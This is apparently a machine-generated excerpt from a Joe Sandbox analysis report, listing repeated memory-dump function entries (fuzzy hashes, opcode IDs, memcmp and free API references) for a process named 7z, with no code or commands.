                                                                • Opcode ID: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
                                                                • Instruction ID: c5512b675711470636599211fa8c96c9c462a38f2054530a536cd5a3a64f68bc
                                                                • Opcode Fuzzy Hash: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
                                                                • Instruction Fuzzy Hash: E80128B2305B0192EB089F22EC513A837559B29FD9F869021CE09AF305EF38DA55C344
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: memcmp
                                                                • String ID:
                                                                • API String ID: 1475443563-0
                                                                • Opcode ID: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
                                                                • Instruction ID: 1a51fdd1aaaedd3da91d3f7a799e25b8c2b6476778c8d6ecf524a0cf82485257
                                                                • Opcode Fuzzy Hash: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
                                                                • Instruction Fuzzy Hash: C60126B2704B1191EB088B26AC513A822259B19FC4F85A0318E168B306EF38CB56C304
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: memcmp
                                                                • String ID:
                                                                • API String ID: 1475443563-0
                                                                • Opcode ID: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
                                                                • Instruction ID: 6020fb7bd6562a62c5a491a6620b5cb087012968964e88fcca95a78ffe3fc10d
                                                                • Opcode Fuzzy Hash: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
                                                                • Instruction Fuzzy Hash: 7901F5B2305B4092EB08DF269C513A42B669B59FD9FC59431CE0AAF305EF38DA4AC344
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
                                                                • Instruction ID: 18b7fd23552f05e0e0fb91852b80d61cbf1ef02feb89f3e6e5d69c9388eeac62
                                                                • Opcode Fuzzy Hash: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
                                                                • Instruction Fuzzy Hash: E501B562720D84D59629ED57D8805AA6614BB92BE571D4235EF780B740EF70C8D3C300
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
                                                                • Instruction ID: bf0664f2a3a1514fa22a26037be7d20f6e9a51c2455173d5f05f5886b5edd8cc
                                                                • Opcode Fuzzy Hash: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
                                                                • Instruction Fuzzy Hash: C2F08253711994A9CA18EE27DC911A82364AF67FA8B1C4271EF1D0B754EF30CCA28300
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
                                                                • Instruction ID: 9fe0718d7ba22388173009ec0565976f59c760751d357bff19a873a30a53bc74
                                                                • Opcode Fuzzy Hash: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
                                                                • Instruction Fuzzy Hash: 84F05413745580AACA14EE27ED911A86310BB57BA975C0671EF2D0B745DF30C8B68350
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
                                                                • Instruction ID: 6e11287c21428780d65c96779f6c0f68dfb5b2d89bbf0fe8e9ad9139c1d17f6d
                                                                • Opcode Fuzzy Hash: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
                                                                • Instruction Fuzzy Hash: 6DF0891370188499C71AEE26DC511A853209B9BFD5B1D4371DF2D0B355DF34CC92C300